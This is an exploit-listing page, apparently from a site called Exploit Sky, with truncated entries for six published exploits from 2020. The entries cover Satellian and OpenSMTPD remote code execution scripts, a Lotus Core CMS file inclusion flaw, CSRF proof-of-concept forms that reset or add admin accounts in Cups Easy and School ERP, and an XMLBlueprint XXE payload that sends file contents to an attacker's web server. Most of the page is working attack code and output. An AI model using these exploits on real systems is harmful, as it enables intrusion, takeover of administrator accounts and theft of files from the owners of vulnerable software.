EXPLOIT SKY

# Exploit Title: Satellian 1.12 - Remote Code Execution # Date: 2020-01-28 # Exploit Author: Xh4H # Vendor Homepage: https://www.intelliantech.com/?lang=en # Version: v1.12+ # Tested on: Kali linux, MacOS # CVE : CVE-2020-7980 # Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980 # xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted> # ________________________________________ # (__) / \ # (oo) ( Intellian Satellite Terminal PoC ) # /-------\/ --' \________________________________________/ # / | || # * ||----|| # Performing initial scan. Listing available system binaries. # Starting request to http://<redacted> # Executing command /bin/ls /bin # acu_server # acu_tool # addgroup # adduser # ... # Satellian $ id # uid=0(root) gid=0(root) import requests import argparse import sys import calendar imp...

# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion # Google Dork: N/A # Date: 2020-01-31 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: http://lotuscore.sourceforge.net/ # Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download # Version: 1.0.1 # Tested on: Windows 7 x86 # CVE : N/A The vulnerability occurs on line 65 of the index.php file, first we can provide the page_slug parameter, if it's not set by the user it is set to index, but if the user sets the parameter via a GET or POST request, it checks if the file exists and if it exists, it performs an unsanitized inclusion. ----------------------------------------------------------------------------- if(!$_REQUEST['page_slug']){ $_REQUEST['page_slug'] = 'index'; } if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){ include('system/plugins/'.$_REQUEST['page_slug'].'.php'); }else{ in...

# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset) # Date: 2020-01-28 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/ # Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/ # Version: 1.0 # Tested on Windows 10/Kali Rolling # CVE: CVE-2020-8424, CVE-2020-8425 # The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery # that would allow an attacker to change the Admin password and gain unrestricted # access to the site or delete any user. # Proof of Concept Code for Password Change: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name...

# Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection # Exploit Author: Javier Olmedo # Date: 2018-11-14 # Vendor: XMLBlueprint XML Editor # Software Link: https://www.xmlblueprint.com/update/download-64bit.exe # Affected Version: 16.191112 and before # Patched Version: unpatched # Category: Local # Platform: XML # Tested on: Windows 10 Pro # CWE: https://cwe.mitre.org/data/definitions/611.html # CVE: 2019-19032 # References: # https://hackpuntes.com/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/ # 1. Technical Description # XMLBlueprint XML Editor version 16.191112 and before are affected by XML External Entity # Injection vulnerability through the malicious XML file. This allows a malicious user # to read arbitrary files. # 2. Proof Of Concept (PoC) # 2.1 Start a webserver to receive the connection. python -m SimpleHTTPServer 80 # 2.2 Upload the payload.dtd file to your web server. <?xml version="1.0" encoding="UTF-8"?> ...

# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11 (x64) # CVE: CVE-2020-7247 # References: # https://www.openwall.com/lists/oss-security/2020/01/28/3 # OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately # escape dangerous characters from user-controlled input. An attacker # can exploit this to execute arbitrary shell commands on the target. #!/usr/local/bin/python3 from socket import * import sys if len ( sys . argv ) != 4 : print ( 'Usage {} <target ip> <target port> <command>' . format ( sys . argv [ 0 ] ) ) print ( "E.g. {} 127.0.0.1 25 'touch /tmp/x'" . format ( sys . argv [ 0 ] ) ) sys . exit ( 1 ) ADDR = sys...

# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin) # Date: 2020-01-31 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ # Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/ # Version ERP-Ultimate # Tested on Windows 10/Kali Rolling # The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery  # that leads to admin account creation and arbitrary user deletion. # Proof of Concept for the Admin Account Creation: <html>   <body>   <script>history.pushState('', '', '/')</script>     <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">       <input type="hidden" name="admin&#95;fname" value="Admin" />       <input type="hidden" name="admin&#95;lname" value="Tester" /...